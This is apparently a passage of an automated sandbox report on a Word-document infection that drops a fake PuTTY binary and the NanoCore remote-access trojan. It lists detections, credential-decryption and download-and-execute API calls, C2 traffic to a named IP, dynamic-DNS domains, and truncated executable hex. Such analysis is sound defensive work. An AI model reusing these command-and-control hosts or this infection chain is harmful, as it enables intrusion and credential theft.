        Source: Yara matchFile source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Machine Learning detection for dropped fileShow sources
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeJoe Sandbox ML: detected
        Source: C:\ProgramData\images.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\putty.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exeJoe Sandbox ML: detected
        Source: 21.2.images.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: 15.2.putty.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpackAvira: Label: TR/Dropper.Gen
        Source: 34.2.iBCrDCK.i.exe.440000.4.unpackAvira: Label: TR/NanoCore.fadte
        Source: 13.2.putty.exe.400000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,13_2_0040A8C3
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,13_2_0040C261
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,13_2_0040C3B9
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,13_2_0040C419
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,13_2_00409D97
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,13_2_0040C6BD
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,15_2_0040A8C3
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,15_2_0040C261
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,15_2_0040C3B9
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,15_2_0040C419
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,15_2_00409D97
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,15_2_0040C6BD
        Source: C:\Users\user\AppData\Roaming\putty.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dll
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: System.Management.Automation.pdbBBfop source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, images.exe
        Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe
        Source: Binary string: wuser32.pdb source: images.exe
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2096511156.0000000002960000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2100589485.00000000029A0000.00000002.00000001.sdmp, putty.exe, 0000000A.00000002.2117131809.0000000000770000.00000002.00000001.sdmp
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411446 FindFirstFileW,FindNextFileW,13_2_00411446
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,13_2_0040955B
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411446 FindFirstFileW,FindNextFileW,15_2_00411446
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,15_2_0040955B
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,13_2_0041154A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

        Software Vulnerabilities:

        barindex
        Document exploit detected (creates forbidden files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScTJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exeJump to behavior
        Document exploit detected (drops PE files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: putty[1].exe.0.drJump to dropped file
        Document exploit detected (process start blacklist hit)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_005A1750
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_005A1740
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_005A1678
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_005A1818
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_005A1688
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h11_2_00401853
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h11_2_00401858
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h11_2_00401920
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h11_2_00401780
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h11_2_00401790
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_004A1740
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_004A1750
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_004A1678
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_004A1807
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_004A1818
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_004A1688
        Source: global trafficDNS query: name: newhosteeeee.ydns.eu
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 203.159.80.186:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 203.159.80.186:80

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 203.159.80.186:8234
        Uses dynamic DNS servicesShow sources
        Source: unknownDNS query: name: hhjhtggfr.duckdns.org
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040290E URLDownloadToFileW,ShellExecuteW,13_2_0040290E
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 203.159.80.186:6703
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 01 Aug 2021 22:25:10 GMTAccept-Ranges: bytesETag: "6ca734172487d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:59:54 GMTContent-Length: 731648Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 01 Aug 2021 22:25:10 GMTAccept-Ranges: bytesETag: "6ca734172487d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:59:57 GMTContent-Length: 731648Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 01 Aug 2021 22:25:10 GMTAccept-Ranges: bytesETag: "6ca734172487d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:59:57 GMTContent-Length: 731648Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 02 Aug 2021 07:13:53 GMTAccept-Ranges: bytesETag: "382415f36d87d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 09:00:29 GMTContent-Length: 1378816Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 31 9b 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2e 14 00 00 da 00 00 00 00 00 00 06 4c 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 4b 14 00 4f 00 00 00 00 60 14 00 20 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 